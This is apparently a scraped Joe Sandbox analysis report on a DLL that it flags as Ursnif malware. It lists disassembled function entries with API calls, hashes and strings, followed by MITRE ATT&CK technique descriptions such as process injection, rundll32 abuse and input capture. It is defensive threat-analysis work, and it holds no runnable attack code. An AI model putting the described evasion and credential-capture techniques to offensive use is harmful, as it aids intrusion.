Opcode Fuzzy Hash: 1cfb65accd97bfd254efd22606ae9ef946a57f7f1d061dffd374167ea91001fe
Instruction Fuzzy Hash: 6101F13220E7136EEA8416789CB0F262674EB83679736423EF638862D4EF528C01C9D0

Uniqueness

Uniqueness Score: -1.00%

Function 6D4E0FA2, Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 83
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

C:\Windows\SysWOW64\rundll32.exe, xrefs: 6D4E0FA7

Memory Dump Source

Source File: 00000005.00000002.1097380060.000000006D4AE000.00000020.00020000.sdmp, Offset: 6D4AE000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6d4ae000_rundll32.jbxd

Similarity

API ID:
String ID: C:\Windows\SysWOW64\rundll32.exe
API String ID: 0-2837366778
Opcode ID: 8485b27fb4ba88a4c63cc48041d18d01d3502fb80163be4382c22dea556ffcc7
Instruction ID: fe9a874c504df374da96fcf93b0bc4fdc5246f18f872de6ea42a0c212c17a954
Opcode Fuzzy Hash: 8485b27fb4ba88a4c63cc48041d18d01d3502fb80163be4382c22dea556ffcc7
Instruction Fuzzy Hash: 3C21A4716482067FDB20DF768C80E6BB7ADEF413EA7114919F624E7A50EB30DD5087A1

Uniqueness

Uniqueness Score: -1.00%

Function 6D4E4D1B, Relevance: 7.5, APIs: 5, Instructions: 40COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 6D4E4D33

Part of subcall function 6D4E0736: HeapFree.KERNEL32(00000000,00000000,?,6D4E4DAE,?,00000000,?,6D509096,?,6D4E4DD5,?,00000007,?,?,6D4E2ED9,?), ref: 6D4E074C
Part of subcall function 6D4E0736: GetLastError.KERNEL32(?,?,6D4E4DAE,?,00000000,?,6D509096,?,6D4E4DD5,?,00000007,?,?,6D4E2ED9,?,?), ref: 6D4E075E

_free.LIBCMT ref: 6D4E4D45
_free.LIBCMT ref: 6D4E4D57
_free.LIBCMT ref: 6D4E4D69
_free.LIBCMT ref: 6D4E4D7B

Memory Dump Source

Source File: 00000005.00000002.1097380060.000000006D4AE000.00000020.00020000.sdmp, Offset: 6D4AE000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6d4ae000_rundll32.jbxd

Similarity

API ID: _free$ErrorFreeHeapLast
String ID:
API String ID: 776569668-0
Opcode ID: fe5e775f17b681ccb50e5caf04730a911bdbac6678a20df1f3acec7a6b436baf
Instruction ID: 87609a9906461c223975c617c3859956e864a5d95ac905274ff42403ebee3eca
Opcode Fuzzy Hash: fe5e775f17b681ccb50e5caf04730a911bdbac6678a20df1f3acec7a6b436baf
Instruction Fuzzy Hash: 9CF03C32408255BBDE20DE65D0C0D7B73E9AA4A3D2366880DE168DBB00CF24FC808EA0

Uniqueness

Uniqueness Score: -1.00%

Function 6D4E0926, Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 206COMMON

Download Yara Rule

APIs

_free.LIBCMT ref: 6D4E0AC0

Strings

*?, xrefs: 6D4E0969

Memory Dump Source

Source File: 00000005.00000002.1097380060.000000006D4AE000.00000020.00020000.sdmp, Offset: 6D4AE000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6d4ae000_rundll32.jbxd

Similarity

API ID: _free
String ID: *?
API String ID: 269201875-2564092906
Opcode ID: cae5a1d20d404d27c97126f5a7490949682a01efc8be1cbb21b7cc0484ab180d
Instruction ID: 84d1a3c2f1e42a49b9fbb3f91081446061c26815b60ba2295d3cd1d7bed5a214
Opcode Fuzzy Hash: cae5a1d20d404d27c97126f5a7490949682a01efc8be1cbb21b7cc0484ab180d
Instruction Fuzzy Hash: 91614075D0421AAFDB15CFAAC8809EEFBF5FF48354B258169D864E7300DB359E418B90

Uniqueness

Uniqueness Score: -1.00%

Function 6D4E473A, Relevance: 7.2, APIs: 3, Strings: 1, Instructions: 177fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

Part of subcall function 6D4E3ECF: GetConsoleCP.KERNEL32(?,00000001,00000000), ref: 6D4E3F17

WriteFile.KERNEL32(?,00000000,6D4E27CC,?,00000000,?,?,?,6D4E275B,?,?,?,6D508130,0000002C,6D4E27CC,?), ref: 6D4E488B
GetLastError.KERNEL32 ref: 6D4E4895
__dosmaperr.LIBCMT ref: 6D4E48DA

Strings

['Nm, xrefs: 6D4E4875, 6D4E4864, 6D4E4854, 6D4E4844, 6D4E4808, 6D4E47EE, 6D4E47F2, 6D4E480D, 6D4E4849, 6D4E4859, 6D4E4869

Memory Dump Source

Source File: 00000005.00000002.1097380060.000000006D4AE000.00000020.00020000.sdmp, Offset: 6D4AE000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6d4ae000_rundll32.jbxd

Similarity

API ID: ConsoleErrorFileLastWrite__dosmaperr
String ID: ['Nm
API String ID: 251514795-1572042932
Opcode ID: e2f413d9e491aa20e69625354c97f892c8c484af896b8404ac79454e40825215
Instruction ID: be01dc899dbaa7fcbc4affa0171e3af640204efa60aa4bc1744593fa648cb33f
Opcode Fuzzy Hash: e2f413d9e491aa20e69625354c97f892c8c484af896b8404ac79454e40825215
Instruction Fuzzy Hash: 5351E075A0421ABBEF01CBA8C880FEE7BB8BF4E3DAF120555E514A7251D770DD018BA0

Uniqueness

Uniqueness Score: -1.00%

Function 6D4DDD66, Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 112COMMONLIBRARYCODE

Download Yara Rule

APIs

RtlEncodePointer.NTDLL(00000000), ref: 6D4DDD8B
CatchIt.LIBVCRUNTIME ref: 6D4DDE71

Strings

RCC, xrefs: 6D4DDDA5
MOC, xrefs: 6D4DDD9D

Memory Dump Source

Source File: 00000005.00000002.1097380060.000000006D4AE000.00000020.00020000.sdmp, Offset: 6D4AE000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6d4ae000_rundll32.jbxd

Similarity

API ID: CatchEncodePointer
String ID: MOC$RCC
API String ID: 1435073870-2084237596
Opcode ID: cc8c67824a3ac36572c0d73191a3809fd92ff93fca4bcca1bd84a215e910309d
Instruction ID: f0e64566a6de7176826e379737fd5114846be050f947485f646a0af8f6c3028b
Opcode Fuzzy Hash: cc8c67824a3ac36572c0d73191a3809fd92ff93fca4bcca1bd84a215e910309d
Instruction Fuzzy Hash: 5041587190060AAFCF41CF94CC90EEE7BB5BF88304F258099EA19A7221D335AD50DF90

Uniqueness

Uniqueness Score: -1.00%

Function 6D4DD759, Relevance: 6.2, APIs: 4, Instructions: 168COMMONLIBRARYCODE

Download Yara Rule

APIs

___AdjustPointer.LIBCMT ref: 6D4DD820
___AdjustPointer.LIBCMT ref: 6D4DD843
___AdjustPointer.LIBCMT ref: 6D4DD8DF

Memory Dump Source

Source File: 00000005.00000002.1097380060.000000006D4AE000.00000020.00020000.sdmp, Offset: 6D4AE000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6d4ae000_rundll32.jbxd

Similarity

API ID: AdjustPointer
String ID:
API String ID: 1740715915-0
Opcode ID: af0339a9fd17988ac0b7f9a09f828bfb4dbeb6087244d90e1d271c16d1c821e3
Instruction ID: 73e83428b56918b278c83cafe28ad0634f5bd3342b488396aba04ea090308d2e
Opcode Fuzzy Hash: af0339a9fd17988ac0b7f9a09f828bfb4dbeb6087244d90e1d271c16d1c821e3
Instruction Fuzzy Hash: 1D51DF72909706AFEB568F14C8A0F7A77A4BF85714F24452DE9A197290D731EC41CF90

Uniqueness

Uniqueness Score: -1.00%

Function 6D4E083A, Relevance: 6.1, APIs: 4, Instructions: 86COMMON

Download Yara Rule

APIs

Part of subcall function 6D4E0E5C: _free.LIBCMT ref: 6D4E0E6A

Part of subcall function 6D4E1A36: WideCharToMultiByte.KERNEL32(?,00000000,6D4E27CC,00000000,00000001,?,_HNm,?,6D4E27CC,?,00000000,?,6D4E45CE,0000FDE9,00000000,?), ref: 6D4E1AD8

GetLastError.KERNEL32 ref: 6D4E08A2
__dosmaperr.LIBCMT ref: 6D4E08A9
GetLastError.KERNEL32(?,?,?,?,?,?,?), ref: 6D4E08E8
__dosmaperr.LIBCMT ref: 6D4E08EF

Memory Dump Source

Source File: 00000005.00000002.1097380060.000000006D4AE000.00000020.00020000.sdmp, Offset: 6D4AE000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6d4ae000_rundll32.jbxd

Similarity

API ID: ErrorLast__dosmaperr$ByteCharMultiWide_free
String ID:
API String ID: 167067550-0
Opcode ID: 1ac6c75cdf9def5779a8757a8501bbff243ebd136c1c43d40018c1bf8ba80cc5
Instruction ID: 21d260819395979812b9bbd63eb2df4e672626c9cd9e2db87c693ccd0176e6a5
Opcode Fuzzy Hash: 1ac6c75cdf9def5779a8757a8501bbff243ebd136c1c43d40018c1bf8ba80cc5
Instruction Fuzzy Hash: CB21747160861ABFAB109F678C80D6BB7ADFF413EA7158528E57897250EF30ED4087E1

Uniqueness

Uniqueness Score: -1.00%

Function 6D4E1C59, Relevance: 6.1, APIs: 4, Instructions: 77COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000005.00000002.1097380060.000000006D4AE000.00000020.00020000.sdmp, Offset: 6D4AE000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6d4ae000_rundll32.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 90048043458cb529fc2dd9bf2d08777c91f28de660d77a6deb805bc36c011fbe
Instruction ID: 76227c668dfce68c6afca3ddfea8e4319b5ef131d245a6f4b917d9ce4e8b7302
Opcode Fuzzy Hash: 90048043458cb529fc2dd9bf2d08777c91f28de660d77a6deb805bc36c011fbe
Instruction Fuzzy Hash: B021DB71E85621B7DF1287649C84F6A37686F427E2B224115ED16E7381D730ED01C9D0

Uniqueness

Uniqueness Score: -1.00%

Function 6D4E02DC, Relevance: 6.1, APIs: 4, Instructions: 72COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(?,?,?,6D4E4315,?,00000001,6D4E27CC,?,6D4E47D4,00000001,?,?,?,6D4E275B,?,?), ref: 6D4E02E1
_free.LIBCMT ref: 6D4E033E
_free.LIBCMT ref: 6D4E0374
SetLastError.KERNEL32(00000000,6D5090D0,000000FF,?,6D4E47D4,00000001,?,?,?,6D4E275B,?,?,?,6D508130,0000002C,6D4E27CC), ref: 6D4E037F

Memory Dump Source

Source File: 00000005.00000002.1097380060.000000006D4AE000.00000020.00020000.sdmp, Offset: 6D4AE000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6d4ae000_rundll32.jbxd

Similarity

API ID: ErrorLast_free
String ID:
API String ID: 2283115069-0
Opcode ID: edc94fe845f42eeb7999e2d98891cc47cb05a2d53c6c0e6261b03449cef67b08
Instruction ID: bc7ff0b20d7f609026df3f0d8012ee6f409ee0379b525228fc4f6e7f9b639ad0
Opcode Fuzzy Hash: edc94fe845f42eeb7999e2d98891cc47cb05a2d53c6c0e6261b03449cef67b08
Instruction Fuzzy Hash: D011A7362496067BDB31967A5C80F2B217A9BC23FBB2A422CF234962D5DF308C018550

Uniqueness

Uniqueness Score: -1.00%

Function 6D4E0433, Relevance: 6.1, APIs: 4, Instructions: 69COMMONLIBRARYCODE

Download Yara Rule

APIs

GetLastError.KERNEL32(00000001,00000001,6D509096,6D4E06CB,6D4E0611,6D509094,?,6D4DC2F9,6D509096,6D509094,?,?,?,6D4DA14E,00000001,6D509098), ref: 6D4E0438
_free.LIBCMT ref: 6D4E0495
_free.LIBCMT ref: 6D4E04CB
SetLastError.KERNEL32(00000000,6D5090D0,000000FF,?,6D4DC2F9,6D509096,6D509094,?,?,?,6D4DA14E,00000001,6D509098), ref: 6D4E04D6

Memory Dump Source

Source File: 00000005.00000002.1097380060.000000006D4AE000.00000020.00020000.sdmp, Offset: 6D4AE000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6d4ae000_rundll32.jbxd

Similarity

API ID: ErrorLast_free
String ID:
API String ID: 2283115069-0
Opcode ID: 3fb5ec5ec5484db0adeb2277af4f899019c83b27173f1c2a41f3d0bd06ad8900
Instruction ID: d2b9641afe75566c3df2180903c3c2a59ed5fbd2900c54d7c1ea34eb1fb69cbd
Opcode Fuzzy Hash: 3fb5ec5ec5484db0adeb2277af4f899019c83b27173f1c2a41f3d0bd06ad8900
Instruction Fuzzy Hash: F911AC366496023ADF11967ADD84F27227A9BC22F7B2A433CF638A62D0DF318C018550

Uniqueness

Uniqueness Score: -1.00%

Function 6D4DE723, Relevance: 6.1, APIs: 4, Instructions: 62COMMONLIBRARYCODE

Download Yara Rule

APIs

FreeLibrary.KERNEL32(00000000,?,?,?,6D4DE7E4,?,?,6D51AA24,00000000,?,6D4DE90F,00000004,6D5033BC,6D5033B4,6D5033BC,00000000), ref: 6D4DE7B3

Memory Dump Source

Source File: 00000005.00000002.1097380060.000000006D4AE000.00000020.00020000.sdmp, Offset: 6D4AE000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6d4ae000_rundll32.jbxd

Similarity

API ID: FreeLibrary
String ID:
API String ID: 3664257935-0
Opcode ID: 4a1bd830db653b9bcb64f7bfc0708b143fb34a1f190c85c708bc371cb3526e21
Instruction ID: a649fcededa5587265eb86119c4e5a96778eb533337fca3aa28abf5dba02169a
Opcode Fuzzy Hash: 4a1bd830db653b9bcb64f7bfc0708b143fb34a1f190c85c708bc371cb3526e21
Instruction Fuzzy Hash: E211C636A45622ABDFE29A68CCD4F5AB7B4AF03770F254131EA55E7380D770ED0086D1

Uniqueness

Uniqueness Score: -1.00%

Function 6D4E5566, Relevance: 6.0, APIs: 4, Instructions: 29COMMONLIBRARYCODE

Download Yara Rule

APIs

WriteConsoleW.KERNEL32(?,?,6D4E27CC,00000000,?,?,6D4E4FC6,?,00000001,?,00000001,?,6D4E42A4,00000000,?,00000001), ref: 6D4E557D
GetLastError.KERNEL32(?,6D4E4FC6,?,00000001,?,00000001,?,6D4E42A4,00000000,?,00000001,00000000,00000001,?,6D4E47F8,['Nm), ref: 6D4E5589

Part of subcall function 6D4E554F: CloseHandle.KERNEL32(6D5098D0,6D4E5599,?,6D4E4FC6,?,00000001,?,00000001,?,6D4E42A4,00000000,?,00000001,00000000,00000001), ref: 6D4E555F

___initconout.LIBCMT ref: 6D4E5599

Part of subcall function 6D4E5511: CreateFileW.KERNEL32(6D506778,40000000,00000003,00000000,00000003,00000000,00000000,6D4E5540,6D4E4FB3,00000001,?,6D4E42A4,00000000,?,00000001,00000000), ref: 6D4E5524

WriteConsoleW.KERNEL32(?,?,6D4E27CC,00000000,?,6D4E4FC6,?,00000001,?,00000001,?,6D4E42A4,00000000,?,00000001,00000000), ref: 6D4E55AE

Memory Dump Source

Source File: 00000005.00000002.1097380060.000000006D4AE000.00000020.00020000.sdmp, Offset: 6D4AE000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6d4ae000_rundll32.jbxd

Similarity

API ID: ConsoleWrite$CloseCreateErrorFileHandleLast___initconout
String ID:
API String ID: 2744216297-0
Opcode ID: 134fd8dc7592037b65b20d183cb1df952f1fa42d2732f5d0a19895be7a0a1cf1
Instruction ID: 3bcd926009afb093f79b9f06d150f185f46bab88ac14716b933eb004d59d138d
Opcode Fuzzy Hash: 134fd8dc7592037b65b20d183cb1df952f1fa42d2732f5d0a19895be7a0a1cf1
Instruction Fuzzy Hash: 82F0F836401965BBCF626F958D08E993F76EF8A3B2F064014FA1985224C732CD20DBD0

Uniqueness

Uniqueness Score: -1.00%

Function 6D4DAAB0, Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 148COMMON

Download Yara Rule

APIs

___std_exception_copy.LIBVCRUNTIME ref: 6D4DAC20

Strings

<(Pm, xrefs: 6D4DAC2B
ror, xrefs: 6D4DAAE6

Memory Dump Source

Source File: 00000005.00000002.1097380060.000000006D4AE000.00000020.00020000.sdmp, Offset: 6D4AE000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6d4ae000_rundll32.jbxd

Similarity

API ID: ___std_exception_copy
String ID: <(Pm$ror
API String ID: 2659868963-41268868
Opcode ID: 966ee975c3b5f3a4e84d5b9a4e35da1e41acf5d4b045e71224632e3ea29cf407
Instruction ID: ae9e63782f77de96b7dbb02a5cb8ea27e6947205f72484eed556feca819f5874
Opcode Fuzzy Hash: 966ee975c3b5f3a4e84d5b9a4e35da1e41acf5d4b045e71224632e3ea29cf407
Instruction Fuzzy Hash: 2651E371E002489FDB14CFA8C994FAEBBB5FF59314F10861DE415AB781E734A981CBA1

Uniqueness

Uniqueness Score: -1.00%

Function 6D4DF2D2, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 123COMMON

Download Yara Rule

Strings

C:\Windows\SysWOW64\rundll32.exe, xrefs: 6D4DF315, 6D4DF31C, 6D4DF352

Memory Dump Source

Source File: 00000005.00000002.1097380060.000000006D4AE000.00000020.00020000.sdmp, Offset: 6D4AE000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6d4ae000_rundll32.jbxd

Similarity

API ID:
String ID: C:\Windows\SysWOW64\rundll32.exe
API String ID: 0-2837366778
Opcode ID: dcde4c5a45d6d83b7da112a86d4e4c58b6338dcdfb7da2fa392839708ae48de0
Instruction ID: dcfa42301ab0a8c8956bc2f256245151bf5792ca795e8657f5b9126778770e33
Opcode Fuzzy Hash: dcde4c5a45d6d83b7da112a86d4e4c58b6338dcdfb7da2fa392839708ae48de0
Instruction Fuzzy Hash: 00419371A05695AFDF62CF99CC91EAEBBF8EF85350B2240AAE510D7310D7708E45CB90

Uniqueness

Uniqueness Score: -1.00%

Function 6D4DD300, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 122COMMON

Download Yara Rule

APIs

___except_validate_context_record.LIBVCRUNTIME ref: 6D4DD33F
__IsNonwritableInCurrentImage.LIBCMT ref: 6D4DD3F3

Strings

csm, xrefs: 6D4DD3DD

Memory Dump Source

Source File: 00000005.00000002.1097380060.000000006D4AE000.00000020.00020000.sdmp, Offset: 6D4AE000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6d4ae000_rundll32.jbxd

Similarity

API ID: CurrentImageNonwritable___except_validate_context_record
String ID: csm
API String ID: 3480331319-1018135373
Opcode ID: ae63e5f0eb34858746e546229bc7f86adcd5062bd4ac9f53f2e4f3b5cfb33089
Instruction ID: 38b25a93d7347d3eb3b07846872bbac7af8c1b27bf1d54b5ff3a03e315aa8e16
Opcode Fuzzy Hash: ae63e5f0eb34858746e546229bc7f86adcd5062bd4ac9f53f2e4f3b5cfb33089
Instruction Fuzzy Hash: FB41A534A04319ABCF40DF68C890E9EBBB5BF85318F158069E9149B391D731ED11CF91

Uniqueness

Uniqueness Score: -1.00%

Function 6D4E14AA, Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 100COMMON

Download Yara Rule

APIs

Part of subcall function 6D4E1253: GetOEMCP.KERNEL32(00000000,6D4E14C5,6D4E3F2B,00000000,?,?,00000000,?,6D4E3F2B), ref: 6D4E127E

_free.LIBCMT ref: 6D4E1522

Strings

+?Nm, xrefs: 6D4E14DC

Memory Dump Source

Source File: 00000005.00000002.1097380060.000000006D4AE000.00000020.00020000.sdmp, Offset: 6D4AE000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6d4ae000_rundll32.jbxd

Similarity

API ID: _free
String ID: +?Nm
API String ID: 269201875-616114912
Opcode ID: 745cea63aa7fa34a5145602f00bca28f6ececf98b92e613dbe73eca86c9aa858
Instruction ID: 4156e603aa3197cbddcaf9608e4ea8f09e4f836a93d8cef9d94d13628f9a5607
Opcode Fuzzy Hash: 745cea63aa7fa34a5145602f00bca28f6ececf98b92e613dbe73eca86c9aa858
Instruction Fuzzy Hash: E031C17290820ABFCB01DFA8C880F9A77F5AF44356F154169E9269B290EB31DD40CF90

Uniqueness

Uniqueness Score: -1.00%

Function 6D4E1253, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 30COMMON

Download Yara Rule

APIs

GetOEMCP.KERNEL32(00000000,6D4E14C5,6D4E3F2B,00000000,?,?,00000000,?,6D4E3F2B), ref: 6D4E127E
GetACP.KERNEL32(00000000,6D4E14C5,6D4E3F2B,00000000,?,?,00000000,?,6D4E3F2B), ref: 6D4E1295

Strings

+?Nm, xrefs: 6D4E12A2

Memory Dump Source

Source File: 00000005.00000002.1097380060.000000006D4AE000.00000020.00020000.sdmp, Offset: 6D4AE000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_6d4ae000_rundll32.jbxd

Similarity

API ID:
String ID: +?Nm
API String ID: 0-616114912
Opcode ID: bfb02778c3c858c95d9032882147d88b9e6735249fff4f951ca021d7a973990b
Instruction ID: 7934ce9d13a9bf059e9a92883a9c71212572c48ea2739427429b2bae24d8c62b
Opcode Fuzzy Hash: bfb02778c3c858c95d9032882147d88b9e6735249fff4f951ca021d7a973990b
Instruction Fuzzy Hash: 08F04F30944605ABDF12DBA8C84AF6C77B0BB823AAF250748E534DEAD2C7719D85C781

Uniqueness

Uniqueness Score: -1.00%

Description:	Adversaries may abuse Windows Management Instrumentation (WMI) to achieve execution. WMI is a Windows administration feature that provides a uniform environment for local and remote access to Windows system components. It relies on the WMI service for local and remote access and the server message block (SMB) and Remote Procedure Call Service (RPCS) for remote access. RPCS operates over port 135.
Tactics:	Execution
Data Sources:	Authentication logs, Netflow/Enclave netflow, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may directly interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	API monitoring, Loaded DLLs, Process monitoring, System calls
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by hijacking the library manifest used to load DLLs. Adversaries may take advantage of vague references in the library manifest of a program by replacing a legitimate library with a malicious one, causing the operating system to load their malicious library when it is called for by the victim program.
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	Loaded DLLs, Process monitoring, Process use of network
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	API monitoring, DLL monitoring, File monitoring, Named Pipes, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, Email gateway, Environment variable, File monitoring, Malware reverse engineering, Network intrusion detection system, Network protocol analysis, Process command-line parameters, Process monitoring, Process use of network, SSL/TLS inspection, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata
Platforms:	macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse Regsvr32.exe to proxy execution of malicious code. Regsvr32.exe is a command-line program used to register and unregister object linking and embedding controls, including dynamic link libraries (DLLs), on Windows systems. Regsvr32.exe is also a Microsoft signed binary.
Tactics:	Defense Evasion
Data Sources:	Loaded DLLs, Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse rundll32.exe to proxy execution of malicious code. Using rundll32.exe, vice executing directly (i.e. Shared Modules ), may avoid triggering security tools that may not monitor execution of the rundll32.exe process because of allowlists or false positives from normal operations. Rundll32.exe is commonly associated with executing DLL payloads.
Tactics:	Defense Evasion
Data Sources:	DLL monitoring, Loaded DLLs, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	API monitoring, Binary file metadata, DLL monitoring, Kernel drivers, Loaded DLLs, PowerShell logs, Process command-line parameters, Process monitoring, User interface, Windows Registry, Windows event logs
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may gather the system time and/or time zone from a local or remote system. The system time is set and stored by the Windows Time Service within a domain to maintain time synchronization between systems and services in an enterprise network.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of accounts on a system or within an environment. This information can help adversaries determine which accounts exist to aid in follow-on behavior.
Tactics:	Discovery
Data Sources:	API monitoring, Azure activity logs, Office 365 account logs, Process command-line parameters, Process monitoring
Platforms:	AWS, Azure, Azure AD, GCP, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	AWS CloudTrail logs, Azure activity logs, Process command-line parameters, Process monitoring, Stackdriver logs
Platforms:	AWS, Azure, GCP, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Process command-line parameters, Process monitoring, Windows Registry
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	API monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to identify the primary user, currently logged in user, set of users that commonly uses a system, or whether a user is actively using the system. They may do this, for example, by retrieving account usernames or by using OS Credential Dumping . The information may be collected in a number of different ways using other Discovery techniques, because user and username details are prevalent throughout a system and include running process ownership, file/directory ownership, session information, and system logs. Adversaries may use the information from [System Owner/User Discovery](https://attack.mitre.org/techniques/T1033) during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Binary file metadata, File monitoring, Process command-line parameters, Process monitoring
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading ...

Warning!

Analysis Report 1.dll

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Configuration

Threatname: Ursnif

Yara Overview

Memory Dumps

